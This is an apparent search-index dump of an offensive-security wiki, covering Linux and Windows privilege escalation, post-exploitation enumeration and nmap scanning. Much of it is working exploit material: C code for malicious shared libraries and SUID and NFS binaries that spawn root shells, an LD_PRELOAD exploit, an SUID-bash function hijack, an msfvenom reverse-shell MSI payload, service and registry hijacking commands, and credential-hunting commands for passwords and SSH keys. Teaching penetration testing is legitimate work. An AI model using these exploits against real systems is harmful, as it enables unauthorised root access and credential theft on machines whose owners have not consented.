reused credentials. You should try every password you have gathered on all users, you never know when you might find an easy escalation to root. Next, you should hunt down sensitive files and look for stored credentials in configuration and source files of different applications. Naturally, you should also enumerate any local databases you find. Additionally, SSH keys are something to be on the lookout for. 
You should also go through the bash history and look for any passwords which were passed as command-line arguments. You should then move on to looking for exploits. Kernel exploits are really low-hanging fruit, so you should always check the kernel version. Subsequently, proceed by enumerating sudo and the different ways to exploit it, for example via Shell Escape Sequences or LD_PRELOAD . Following, you should proceed by tracking down any misconfigurations such as excessive capabilities or SUID Binaries . You should check if you have write access to any sensitive files such as /etc/passwd or /etc/shadow, as well as any cron jobs or cron job dependencies. Ultimately, you should move on to enumerating running software and services which are executed as root and try to find vulnerabilities in them which may allow for privilege escalation. This can all be summed up into the following: Credentials Reused Credentials Credentials in Configuration or Source Files Credentials from Databases Credentials in Sensitive Files Credentials from Bash History SSH Keys Exploitation Kernel Exploits Sudo Misconfigurations Excessive Capabilities SUID/SGID Binaries Write Access to Sensitive Files Writable Cron Jobs and Cron Job Dependencies Installed Software Vulnerabilities in Software and Services Running as Root","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Methodology","id":"163","title":"Methodology"},"164":{"body":"The Set Owner User ID (SUID) and Set Group ID (SGID) are special permissions which can be attributed to Linux files and folders. Any files which are owned by root and have SUID set will be executed with elevated privileges. Our goal is to hunt down those files and abuse them in order to escalate our privileges. 
This can be easily done with the following command: find / -perm -u=s -type f -user root 2>/dev/null","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Abusing SUID & SGID Binaries » Introduction","id":"164","title":"Introduction"},"165":{"body":"You should diligently inspect the list of files returned. Some standard Linux binaries may allow for privilege escalation if they have the SUID bit set for one reason or another. It is useful to go through these binaries and check them on GTFOBins . In the above example, we find that /bin/systemctl has the SUID bit set and that it also has an entry in GTFOBins : By following the instructions, although with slight modifications, we can run commands with elevated privileges:","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Abusing SUID & SGID Binaries » Exploiting Misconfigured Common Binaries","id":"165","title":"Exploiting Misconfigured Common Binaries"},"166":{"body":"Some binaries may be vulnerable to Shared Object (SO) Injection. This typically stems from misconfigurations where the binary looks for a specific library in a specific directory, but can't actually find it. If we have write access to this directory, we can hijack the search for the library by compiling our own malicious library in the place where the original one was supposed to be. This is quite similar to escalating via LD_PRELOAD , but it is a bit more difficult to find and exploit. You will first need to identify an SUID binary which has misconfigured shared libraries. A lot of the times the binary will refuse to run, saying that it is missing a particular library, however, this is not always the case: It is always good practice to run the programme with strace, which will print any attempts of the binary to access libraries: strace 2>&1 | grep -iE \"open|access\" What stands out in particular is the /home/user/.config/libcalc.so library, since /home/user/.config/ may be a writable directory. 
It turns out that the directory doesn't even exist, however, we can write to /home/user/ which means that we can create it. What now remains is to compile a malicious library into libcalc.so. #include \n#include static void inject() __attribute__((constructor)); void inject()\n{ setuid(0); setgid(0); system(\"/bin/bash -i\");\n} For older versions of GCC, you may need to use the _init() function syntax: #include \n#include void _init()\n{ setuid(0); setgid(0); system(\"/bin/bash -i\");\n} Compile the malicious library: gcc -shared -fPIC -o libcalc.so libcalc.c # add -nostartfiles if using _init()","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Abusing SUID & SGID Binaries » Privilege Escalation via Shared Object Injection","id":"166","title":"Privilege Escalation via Shared Object Injection"},"167":{"body":"Path Hijacking refers to the deliberate manipulation of environmental variables, most commonly \\$PATH, such that the invocations of programmes in a binary actually refer to malicious binaries and not the intended ones. This vector requires more sophisticated digging into the internals of an SUID binary, specifically tracking down the different invocations the binary performs. This can commonly be achieved by running strings on the binary, but you will probably have to resort to more serious reverse engineering, as well. Specifically, you want to be on the lookout for shell commands which get executed by the SUID binary.","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Abusing SUID & SGID Binaries » Privilege Escalation via Path Hijacking","id":"167","title":"Privilege Escalation via Path Hijacking"},"168":{"body":"Relative paths are comparably easy to hijack - they require little other than editing the \\$PATH variable. 
Once you have identified a shell command within an SUID binary which invokes another programme via a relative path, you can just prepend to the \\$PATH a directory which will contain an executable with the same name as the one originally invoked. Let's compile our own malicious binary. #include \n#include int main()\n{ setuid(0); setgid(0); system(\"/bin/bash -i\"); return 0;\n} gcc -o /tmp/service /tmp/service.c Afterwards, we need to prepend /tmp to the \\$PATH variable: export PATH=/tmp:\\$PATH And finally, run the original SUID binary:","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Abusing SUID & SGID Binaries » Hijacking Relative Paths","id":"168","title":"Hijacking Relative Paths"},"169":{"body":"Absolute paths require a bit more work to be hijacked. Luckily, bash turns out to be very sophisticated and allows for the creation of functions which have the forward slash (/) character in their name. This means that we can create a malicious bash function with the same name as the absolute path we want to hijack and then our function will be invoked in lieu of the original programme. First, create the bash function: function () { cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p; } Next, export the function: export -f Finally, run the original SUID binary:","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Abusing SUID & SGID Binaries » Hijacking Absolute Paths","id":"169","title":"Hijacking Absolute Paths"},"17":{"body":"All services which need to somehow interface with the network a host is connected to run on ports and port scanning allows us to enumerate them in order to gather information such as what service is running, which version of the service is running, OS information, etc. Warning Port scanning is very heavy on network bandwidth and generates a lot of traffic which can cause the target to slow down or crash altogether. 
During a penetration test, you should always inform the client when you are about to perform a port scan. Danger Port scanning without prior written permission from the target may be considered illegal in some jurisdictions. The de-facto standard port scanner is nmap , although alternatives such as masscan and RustScan do exist. Info A lot of nmap's techniques require elevated privileges, so it is advisable to always run the tool with sudo.","breadcrumbs":"Reconnaissance » Enumeration » Port Scanning » Introduction","id":"17","title":"Introduction"},"170":{"body":"The kernel is the layer which sits between applications and the hardware. It runs with root privileges, so if it gets exploited, privileges can be escalated. Finding kernel vulnerabilities and writing exploits for them is no trifling task, however, once such a vulnerability is made public and exploit code for it is developed, it easily becomes a low-hanging fruit for escalating privileges. A very useful list of kernel exploits found to date is located here . Finding already existing exploits is really easy - just search for the Linux kernel version!","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Kernel Exploits » Introduction","id":"170","title":"Introduction"},"171":{"body":"As an example, we are going to exploit dirtyc0w. This was a very ubiquitous exploit and can still be found on numerous outdated machines. The exploit itself has many versions but for demonstration purposes we are going to use the one at https://www.exploit-db.com/exploits/40839 . We need to first verify that our kernel version is in the vulnerable range. 
Inside the exploit we see compilation instructions, which is typical of kernel exploits as they are usually written in C: By compiling and running the exploit (it may actually take some time to execute), we have elevated our privileges!","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Kernel Exploits » Exploiting the Kernel","id":"171","title":"Exploiting the Kernel"},"172":{"body":"It is common to see a low-privileged user configured to be able to run some commands via sudo without a password. Luckily, many existing programmes for Linux have advanced capabilities which allow them to do many things such as spawning a shell when run with sudo. If such a programme is configured in the aforementioned way, then there is a shell escape sequence which is a (usually) simple command/argument passed to the programme when run, so that it spawns a shell with elevated privileges when run with sudo. Naturally, these shell escape sequences are programme-specific and it would be inane to try and remember the sequence for every binary. This is where GTFOBins comes in. This is a database of commands (including shell escape sequences) for common Linux binaries which can be used for escalating privileges. We saw in the above list provided by sudo -l that we are allowed to run find as root via sudo. Let's check if there is a shell escape sequence for it. There is! We can copy and paste it, then run it with sudo, and we should at last have a root shell: Another example can be given with the awk binary, which we also saw in the list provided by sudo -l.","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Sudo Shell Escape Sequences » Introduction","id":"172","title":"Introduction"},"173":{"body":"The compromised machine may be configured to allow certain directories to be mounted by other machines. 
You can enumerate such directories by running the following command on the victim machine: cat /etc/exports You can additionally verify this from your attacker machine by running: showmount -e If there is a mountable directory which is configured as no_root_squash, as is the case here, then it can be used for privilege escalation. We begin by mounting the target directory from the victim to a directory on our machine: sudo mount -o rw,vers=3 :/tmp /tmp/root_squash Now, if no_root_squash is configured for the mountable directory, then the root user on the attacker machine will get mirrored on the victim machine. In essence, any command run as root on the attacker machine, will also be executed as root on the victim! This can allow us to create a malicious binary in the mounted directory and set its SUID bit from the attacker machine. This action will be mirrored by the victim and we will essentially have an SUID binary on the target which is all under our control. Let's write a simple malicious C executable: #include \n#include int main()\n{ setuid(0); // Set user ID to root setgid(0); // Set group ID to root system(\"/bin/bash -i\"); // Execute bash now with elevated privileges return 0;\n} It doesn't matter if you create it on the target or the attacker machine, but you must compile it on the target machine in order to avoid library version mismatches: gcc -o nfs_exploit nfs_exploit.c Next, you want to change the ownership of the compiled binary to root on the attacker machine . Afterwards, you want to set the SUID bit on the binary, once again, from the attacker machine : sudo chown root:root nfs_exploit\nsudo chmod +s nfs_exploit Finally, execute the malicious binary on the target :","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » NFS Root Squashing » Introduction","id":"173","title":"Introduction"},"174":{"body":"Linux capabilities provide a way for splitting permissions into small units. 
A binary with particular capabilities can perform certain tasks with elevated privileges. If capabilities are not properly set, or if they are excessive, this may lead to privilege escalation. Binaries with capabilities may be found using the following command: getcap / -r 2>/dev/null A list of all possible capabilities can be found here . In the above example, we can see that the python interpreter can arbitrarily set the user ID of the process. This means that we can change our user ID to 0 when running python, thus escalating our privileges:","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Abusing Linux Capabilities » Introduction","id":"174","title":"Introduction"},"175":{"body":"The LD_PRELOAD environment variable can be used to tell the dynamic linker to load specific libraries before any others. By default, programmes run with sudo will be executed in a clean, minimal environment which is specified by env_reset when running sudo -l. However, env_keep may be used to inherit some environment variables from the parent process. If LD_PRELOAD is specified together with env_keep, then we can compile our own malicious dynamic library and set LD_PRELOAD to it. Therefore, when we execute a binary with sudo, our library will be loaded before any other library and its initialisation function will be invoked with root permissions.","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Sudo Escalation via LD_PRELOAD » Introduction","id":"175","title":"Introduction"},"176":{"body":"Writing the library is a fairly simple task. All we need to do is write an _init function in a C file. This procedure will contain the code we want to be executed when the library is loaded. 
#include \n#include \n#include void _init()\n{ unsetenv(\"LD_PRELOAD\"); // Unset LD_PRELOAD to avoid an infinite loop setgid(0); // Set root permissions setuid(0); // Set root permissions system(\"/bin/bash\");\n} We begin by unsetting the LD_PRELOAD variable from the environment. This is to preclude an infinite loop when /bin/bash is invoked. If our library didn't unset LD_PRELOAD, then when /bin/bash is called, our library will again be loaded first and then proceed onto launching /bin/bash yet again, which will again load our library and so on. The next two lines set the user and group IDs to those of root which ensures that the next commands are run with root privileges. Finally, system is called in order to spawn a bash shell. We now need to compile this file as a shared library: gcc -fPIC -shared -o exploit.so exploit.c -nostartfiles At last, we can invoke any binary with sudo and specify the path to our library as LD_PRELOAD. Note that the path to the library must be specified as an absolute path.","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Sudo Escalation via LD_PRELOAD » Writing the Malicious Library","id":"176","title":"Writing the Malicious Library"},"177":{"body":"Once you have gained access to a system, it is paramount to look for other credentials which may be located on the system. These may be hidden in the Windows Registry, within log or configuration files, and more. Moreover, you should check to see if any credentials you have previously found work with anything else. You should also check if you have access to the Windows SYSTEM or SAM files or any of their backups, since those will contain the hashes for users on the system. If so, you might be able to perform a pass-the-hash attack or simply crack them. If the compromised system is a Windows Server, you should look for any stored credentials which can be used with RunAs. You should check the Windows build and version, see if there are any kernel exploits available. 
You should then move on to enumerating misconfigurations in services and other Windows-specific vectors. If none of these bear any fruit, you should look at the programmes installed on the system, enumerate them for misconfigurations, explore their versions and any exploits which may be available. If none are found, you might consider reverse engineering and binary exploitation as a last resort. Finally, if you have gained access as a local administrator, you should proceed to looking for ways to bypass UAC. In essence: Credentials Reused Credentials Credentials in Configuration or Log files Credentials in the Windows Registry Credentials from Windows SAM and SYSTEM files Pass-the-hash attacks Stored Credentials (Windows Servers) Kernel Exploits Misconfigurations Services AutoRuns Startup Applications Scheduled Tasks AlwaysInstallElevated Group Policy Bypassing UAC","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Methodology","id":"177","title":"Methodology"},"178":{"body":"Windows Services allow for the creation of continuously running executable applications. These applications have the ability to be automatically started upon booting, they may be paused and restarted, and they lack a user interface. In order for a service to function properly, it needs to be associated with a system or user account. There are a few common built-in system accounts that are used to operate services such as LocalService, NetworkService, and LocalSystem. The following table describes the default secure access rights for accounts on a Windows system: Account Permissions Local Authenticated Users (including LocalService and Network Service) READ_CONTROL SERVICE_ENUMERATE_DEPENDENTS SERVICE_INTERROGATE SERVICE_QUERY_CONFIG SERVICE_QUERY_STATUS SERVICE_USER_DEFINED_CONTROL Remote Authenticated Users Same as those for Local Authenticated Users. 
LocalSystem READ_CONTROL SERVICE_ENUMERATE_DEPENDENTS SERVICE_INTERROGATE SERVICE_PAUSE_CONTINUE SERVICE_QUERY_CONFIG SERVICE_QUERY_STATUS SERVICE_START SERVICE_STOP SERVICE_USER_DEFINED_CONTROL Administrators DELETE READ_CONTROL SERVICE_ALL_ACCESS WRITE_DAC WRITE_OWNER Moreover, a registry entry exists for each service in HKLM\\SYSTEM\\CurrentControlSet\\Services.","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Misconfigured Services » Introduction","id":"178","title":"Introduction"},"179":{"body":"In general, manual enumeration of Windows services is a rather cumbersome process, so I suggest that you use a tool for automation such as WinPEAS. winpeas.exe servicesinfo The permissions a user has on a specific service can be inspected via the AccessChk Windows Utility. accesschk.exe /accepteula -uwcqv ","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Misconfigured Services » Enumeration","id":"179","title":"Enumeration"},"18":{"body":"There are two types of ports depending on the transport-layer protocol that they support. Both TCP and UDP ports range from 0 to 65535 but they are completely separate. For example, DNS uses UDP port 53 for queries but it uses TCP port 53 for zone transfers. To scan UDP ports, nmap requires elevated privileges and the -sU flag. nmap -sU Note Due to the nature of the protocol, UDP scanning takes a lot longer than TCP does.","breadcrumbs":"Reconnaissance » Enumeration » Port Scanning » TCP vs UDP","id":"18","title":"TCP vs UDP"},"180":{"body":"This is a vulnerability which can be used to force a misconfigured service to execute an arbitrary programme in lieu of its intended one, as long as the path to that executable contains spaces. On its own, this does not allow for privilege escalation, but it becomes a really powerful tool when the misconfigured service is set to run with system privileges. 
Let's take a look at the following path: C:\\Program Files\\Vulnerable Service\\service.exe If this path was specified to the service in quotation marks, \"C:\\Program Files\\Vulnerable Service\\service.exe\", then Windows will treat it correctly, executing the service.exe file in the C:\\Program Files\\Vulnerable Service directory. However, Windows is not the sharpest tool in the box and if the path is provided without quotation marks, then it will see ambiguity in what it is supposed to execute. The path will be split at each space character - the first segment will be treated as the executable's name and the rest will be seen as command-line arguments to be passed to it. So at first, Windows will try to execute the following: C:\\Program.exe Files\\Vulnerable Service\\service.exe Once Windows determines that the C:\\Program.exe file does not exist, it will look for the next space character, treat the characters up to it as the new path and try to execute it again: C:\\Program Files\\Vulnerable.exe Service\\service.exe Now, this process is repeated until a file is successfully executed or the end of the path has been reached. If we are able to create a malicious executable in any of the possible paths that Windows will traverse, then we can hijack the service before the intended file is found. Once you have identified a vulnerable service, you can query to confirm that the path is indeed unquoted. Let's check our access to the possible directories that will be probed by Windows: accesschk.exe /accepteula -uwdq While we cannot write within the C:\\ or C:\\Program Files directories (meaning that we cannot create C:\\Program.exe or C:\\Program Files\\Unquoted.exe), we do have write access to C:\\Program Files\\Unquoted Path Service\\. 
What this entails is our ability to create a Common.exe binary inside this directory and, since the initial path was unquoted, the path C:\\Program Files\\Unquoted Path Service\\Common.exe will be probed before C:\\Program Files\\Unquoted Path Service\\Common Files\\unquotedpathservice.exe and once Windows finds our malicious executable there, it will be executed with the service's permissions. If we couldn't restart the service, then we could have simply waited for something else to execute it.","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Misconfigured Services » Unquoted Service Paths » Unquoted Service Paths","id":"180","title":"Unquoted Service Paths"},"181":{"body":"As previously mentioned, each service is associated with a registry entry in the Windows Registry which is located at HKLM\\SYSTEM\\CurrentControlSet\\Services\\. This entry is essentially the configuration of the service and if it is writable, then it can be abused by an adversary to overwrite the path to the binary application of the service with a malicious one. Querying regsvc reveals that it is running with system privileges and its registry entry is writable by all logged-on users (NT AUTHORITY\\INTERACTIVE). All we need to do now is overwrite the ImagePath registry key in the service's entry to point to our malicious executable: reg add HKLM\\SYSTEM\\CurrentControlSet\\services\\ /v ImagePath /t REG_EXPAND_SZ /d /f Restart the service and catch the shell: net start regsvc","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Misconfigured Services » Weak Registry Permissions » Weak Registry Permissions","id":"181","title":"Weak Registry Permissions"},"182":{"body":"This is a technique which leverages misconfigurations in the service permissions for a specific user. If permissions for a specific user differ from the ones described in the table here , then they may manifest as a possible vulnerability. 
To identify such services, it is useful to use WinPEAS. It appears that the user has write access to the service daclsvc and can also start the service. We can query the service to see what user account is actually executing it: sc qc It appears that the service is running as LocalSystem which is an account with more privileges than our user account. If we can write to the service, then we can alter its configuration and change the path to the executable which is supposed to be run: sc config binpath=\"\\\"\\\"\" All we now need to do is set up a listener and run the service: net start And we get a system shell back:","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Misconfigured Services » Insecure Service Permissions » Insecure Service Permissions","id":"182","title":"Insecure Service Permissions"},"183":{"body":"The binary application executed by a service is considered insecure when an adversary has write access to it when they shouldn't. This means that an attacker can simply replace the file with a malicious executable. If the service is configured to run with system privileges, then those privileges will be inherited by the attacker's executable! All we need to do is simply replace the legitimate executable with a malicious one and then start the service.","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Misconfigured Services » Insecure Service Executable Permissions » Introduction","id":"183","title":"Introduction"},"184":{"body":"AutoRun applications are programmes which have been set up to automatically execute when a user logs in for the first time after booting the system. This is typically done so that the application can look for updates and update itself if necessary. For example, Steam, Spotify, and Discord all set this up upon installation. On its own, this does not pose a security risk. Where the real vulnerability lies is within AutoRuns which are writable by anyone. 
AutoRuns can be enumerated by querying the registry: reg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run Now all we need to do is generate the malicious executable and replace the AutoRun programme with it. Note that in order for the exploit to work, an administrator would need to log in. Now, as soon as the administrator logs in, we will get an elevated shell.","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » AutoRun Programmes » Introduction","id":"184","title":"Introduction"},"185":{"body":"Windows has a group policy which, when enabled, allows a user to install a Microsoft Windows Installer Package (.msi file) with elevated privileges. This poses a security risk because an adversary can simply generate a malicious .msi file and execute it with admin privileges. In order to check for this vulnerability, one need only query the following registry keys: reg query HKCU\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated\nreg query HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated The AlwaysInstallElevated policy appears enabled, so we can generate a malicious .msi executable. One way to do this is through Metasploit: msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT= -f msi -o reverse.msi Next, transfer the executable to the target machine and execute it with msiexec: msiexec /quiet /qn /i ","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » AlwaysInstallElevated Group Policy » Introduction","id":"185","title":"Introduction"},"186":{"body":"Kernel exploits are one of the most trivial privilege escalation paths available. One of the first things you should do when seeking a privilege escalation vector is to look at the kernel version as well as any installed patches and determine if it is vulnerable to a known kernel exploit. Plenty of exploits can be found just by searching up the kernel version, but a cheat sheet which I like can be found here. 
Naturally, the exploitation of a kernel exploit is highly specific on a case-by-case basis. Once you have identified that the system is vulnerable to a known kernel exploit, you will need to find the exploit code.","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Kernel Exploits » Introduction","id":"186","title":"Introduction"},"187":{"body":"Windows Scheduled Tasks allow for the periodic execution of scripts. These can be manually enumerated via the following command: schtasks /query /fo LIST /v A scheduled task is of interest when it is executed with elevated privileges but we have write access to the script it executes. This script is fairly simple, so we can just append a line to it which executes a malicious executable. When the time for the scheduled task comes, we will catch an elevated shell.","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Scheduled Tasks » Introduction","id":"187","title":"Introduction"},"188":{"body":"User Account Control (UAC) is a security measure introduced in Windows Vista which aims to prevent unauthorised changes to the operating system. It ensures that any such changes require the assent of the administrator or a user who is part of the local administrators group. Administrative privileges in Windows are a bit different from those in Linux. Even if an adversary manages to execute some code from an administrator account, this code will not run with elevated privileges, unless it was \"run as Administrator\"-ed. When an unprivileged user attempts to run a programme as administrator, they will be prompted by UAC to enter the administrator's password. However, if the user is privileged (they are an administrator), they will still be prompted with the same UAC prompt, but it will ask them for consent in lieu of a password. Essentially, an administrative user will need to click \"Yes\" instead of typing their password. What is described so far is the default behaviour. 
UAC, however, has different protection levels which can be configured. There are 3 options (two of them are the same but with different aesthetics). The first option, and the most strict, is Always Notify. If UAC is set to this, then any programme which tries to run with elevated privileges will beget a UAC prompt - including Windows built-in ones. Next is the default setting - Notify me when application try to make changes to my computer. Under this configuration, regular applications will still cause a UAC prompt to show up whenever run as administrator, however, Windows built-in programmes can be run with elevated privileges without such a prompt. Following is another option which is the exact same as this one, but the UAC prompt will not dim the screen. This is useful for computers for which dimming the screen is not exactly a trifling task. Finally, Never Notify means that a UAC prompt will never be spawned no matter who is trying to run the application with elevated privileges. UAC can be bypassed if an adversary already has access to a user account which is part of the local administrators group and UAC is configured to the default setting.","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Bypassing UAC » Introduction","id":"188","title":"Introduction"},"189":{"body":"There are many tools for bypassing UAC and which one is to be used depends on the Windows build and version. One such tool which has lots of methods for bypassing UAC is UACMe. 
You will need to build it from source using Visual Studio, meaning that you will need a Windows machine in order to compile it.","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Bypassing UAC » Bypassing UAC","id":"189","title":"Bypassing UAC"},"19":{"body":"When scanning, nmap will determine that a port is in one of the following states: open - an application is actively listening for TCP connections, UDP datagrams or SCTP associations on this port closed - the port is accessible (it receives and responds to Nmap probe packets), but there is no application listening on it filtered - Nmap cannot determine whether the port is open because packet filtering prevents its probes from reaching the port. Usually, the filter sends no response, so Nmap needs to resend the probe a few times in order to be sure that it wasn't dropped due to traffic congestion. This slows the scan drastically unfiltered - the port is accessible, but Nmap is unable to determine whether it is open or closed. Only the ACK scan, used for mapping firewall rulesets, may put ports in this state open|filtered - Nmap is unable to determine whether the port is open or filtered. This occurs for scan types in which open ports give no response closed|filtered - Nmap is unable to determine whether the port is closed or filtered. It is only used for the IP ID idle scan. By default, nmap scans only the 1000 most common TCP ports. One can scan specific ports by listing them separated by commas directly after the -p flag. nmap -pport1,port2,... If no ports are specified after the -p flag, nmap will scan all ports (either UDP or TCP depending on the type of scan). nmap -p ","breadcrumbs":"Reconnaissance » Enumeration » Port Scanning » Port States","id":"19","title":"Port States"},"190":{"body":"Windows Startup applications are very similar to AutoRun Programmes , however, they are executed every time a user logs in. 
If we can write to the Startups directory, then we can place a malicious executable there which will be executed upon the next login. If the next user to log in is an administrator, then we will gain elevated privileges. To check for write access to the Startups directory, we can use accesschk: C:\\PrivEsc\\accesschk.exe /accepteula -d \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\" All we need to do is place a malicious executable in the directory and wait for an admin to log in.","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Startup Applications » Introduction","id":"190","title":"Introduction"},"191":{"body":"Windows Servers have capabilities to store credentials using a built-in utility called cmdkey . On its own, cmdkey is rather useless to an adversary - you can only really use it to list what credentials are stored but not actually reveal them. cmdkey /list The real deal is another built-in utility called Runas . It allows one user to execute a binary with the permissions of another and, what is essential here, this can be achieved with only stored credentials. One doesn't even need to know what the credentials are - so long as a user has their credentials stored, then they can be used to execute programmes as that user. runas /savedcred /user: ","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Stored Credentials » Introduction","id":"191","title":"Introduction"},"192":{"body":"Windows Access Tokens are objects which describe the security context in which a thread or process is run. The information within an access token identifies the user and their privileges of said process or thread. Upon each successful user log-on, an access token for the user is generated and every process executed by this user will contain a copy of this token called the primary token . 
This token is used by the system to inspect the privileges of the process when the process tries to interact with something which may require certain privileges. However, threads of the process are allowed to use a second token, called an impersonation token, to interact with objects as if they had a different security context and different privileges. This is only allowed when the process has the SeImpersonatePrivilege. As with UAC bypassing, exploiting token impersonation is highly dependent on the Windows build and version. However, the most infamous exploits are the Potato exploits.","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Token Impersonation » Introduction","id":"192","title":"Introduction"},"193":{"body":"","breadcrumbs":"Post Exploitation » Enumeration","id":"193","title":"Post Exploitation"},"194":{"body":"There are plenty of tools which can be used for automating post-exploitation enumeration on Linux machines.","breadcrumbs":"Post Exploitation » Enumeration » Linux » Introduction","id":"194","title":"Introduction"},"195":{"body":"LinPEAS is an amazing tool for automated enumeration. It is written in Bash which means that it requires no additional dependencies and can be freely run. In order to acquire the latest version of LinPEAS, run the following command: wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh By default, running LinPEAS will perform many checks on the system and spit out a deluge of information. However, the tool can also be used to only perform specific tasks using the -o argument. 
Enumerate system information: ./linpeas.sh -o system_information Enumerate containers on the machine: ./linpeas.sh -o container Enumerate cloud platforms: ./linpeas.sh -o cloud Enumerate available software: ./linpeas.sh -o software_information Enumerate processes, cronjobs, services, and sockets: ./linpeas.sh -o procs_crons_timers_srvcs_sockets Enumerate network information: ./linpeas.sh -o network_information Enumerate user information: ./linpeas.sh -o users_information Enumerate interesting files: ./linpeas.sh -o interesting_files","breadcrumbs":"Post Exploitation » Enumeration » Linux » Linux Enumeration with LinPEAS","id":"195","title":"Linux Enumeration with LinPEAS"},"196":{"body":"Find all files in a directory which contain \"pass\" or \"password\", ignoring case: grep --color=auto -rnw '' -ie \"password\\|pass\" --color=always 2>/dev/null Find all files in a directory which contain \"pass\" or \"password\" in their name, ignoring case: find / -name \"*pass*\" 2>/dev/null","breadcrumbs":"Post Exploitation » Enumeration » Linux » Hunting Down Sensitive Files » Finding Files Containing Passwords","id":"196","title":"Finding Files Containing Passwords"},"197":{"body":"find / -name id_rsa 2>/dev/null","breadcrumbs":"Post Exploitation » Enumeration » Linux » Hunting Down Sensitive Files » Finding SSH Keys","id":"197","title":"Finding SSH Keys"},"198":{"body":"System enumeration is a crucial, typically first, step in the enumeration phase of post-exploitation.","breadcrumbs":"Post Exploitation » Enumeration » Linux » System Enumeration » Introduction","id":"198","title":"Introduction"},"199":{"body":"cat /etc/issue","breadcrumbs":"Post Exploitation » Enumeration » Linux » System Enumeration » Enumerating the Distribution Version","id":"199","title":"Enumerating the Distribution Version"},"2":{"body":"You should only make changes inside the eight category folders under the Notes/ directory. 
Minor edits to already existing content outside of the aforementioned allowed directories are permitted as long as they do not bring any semantic change - for example fixing typos.","breadcrumbs":"Cyberclopaedia » Contributing » In-Scope","id":"2","title":"In-Scope"},"20":{"body":"This is the type of scan which nmap defaults to when run with elevated privileges and is also referred to as a \"stealth scan\". Nmap sends a SYN packet to the target, initiating a TCP connection. The target responds with SYN ACK, telling Nmap that the port is accessible. Finally, Nmap terminates the connection before it's finished by issuing an RST packet. This type of scan can also be specified using the -sS option. Note Despite its moniker, a SYN scan is no longer considered \"stealthy\" and is quite easily detected nowadays.","breadcrumbs":"Reconnaissance » Enumeration » Port Scanning » SYN Scan » SYN Scan","id":"20","title":"SYN Scan"},"200":{"body":"uname -a cat /proc/version","breadcrumbs":"Post Exploitation » Enumeration » Linux » System Enumeration » Enumerating Linux Kernel Version Information","id":"200","title":"Enumerating Linux Kernel Version Information"},"201":{"body":"lscpu","breadcrumbs":"Post Exploitation » Enumeration » Linux » System Enumeration » Enumerating CPU Architecture","id":"201","title":"Enumerating CPU Architecture"},"202":{"body":"ps aux","breadcrumbs":"Post Exploitation » Enumeration » Linux » System Enumeration » Enumerating Running Services","id":"202","title":"Enumerating Running Services"},"203":{"body":"List files owned by a certain user in a directory: find -user 2>/dev/null List files owned by a certain user in a directory (without /proc): find -user 2>/dev/null | grep -v \"/proc\" List files owned by a certain group in a directory: find -group 2>/dev/null find -group 2>/dev/null | grep -v \"/proc\" # ignore /proc","breadcrumbs":"Post Exploitation » Enumeration » Linux » System Enumeration » File System Enumeration","id":"203","title":"File 
System Enumeration"},"204":{"body":"whoami id","breadcrumbs":"Post Exploitation » Enumeration » Linux » User Enumeration » Enumerate User Name and Group","id":"204","title":"Enumerate User Name and Group"},"205":{"body":"sudo -l","breadcrumbs":"Post Exploitation » Enumeration » Linux » User Enumeration » Enumerate Commands Runnable as Root","id":"205","title":"Enumerate Commands Runnable as Root"},"206":{"body":"cat /etc/passwd","breadcrumbs":"Post Exploitation » Enumeration » Linux » User Enumeration » List Users on the Machine","id":"206","title":"List Users on the Machine"},"207":{"body":"history","breadcrumbs":"Post Exploitation » Enumeration » Linux » User Enumeration » Get History of Commands the User Has Run","id":"207","title":"Get History of Commands the User Has Run"},"208":{"body":"Get a list of the network interfaces connected to the machine with their IPs and MACs: ip a Get a list of the machines that the victim has been interacting with (print the ARP table): ip neigh","breadcrumbs":"Post Exploitation » Enumeration » Linux » Network Enumeration » List Network Interfaces and Network Information","id":"208","title":"List Network Interfaces and Network Information"},"209":{"body":"netstat -ano","breadcrumbs":"Post Exploitation » Enumeration » Linux » Network Enumeration » List Open Ports","id":"209","title":"List Open Ports"},"21":{"body":"This is the default scan for nmap when it does not have elevated privileges. It initiates a full TCP connection and as a result can be slower. Additionally, it is also logged at the application level. This type of scan can also be specified via the -sT option.","breadcrumbs":"Reconnaissance » Enumeration » Port Scanning » TCP Connect Scan » TCP Connect Scan","id":"21","title":"TCP Connect Scan"},"210":{"body":"Plenty of automated tools can be found for enumerating Windows machines. 
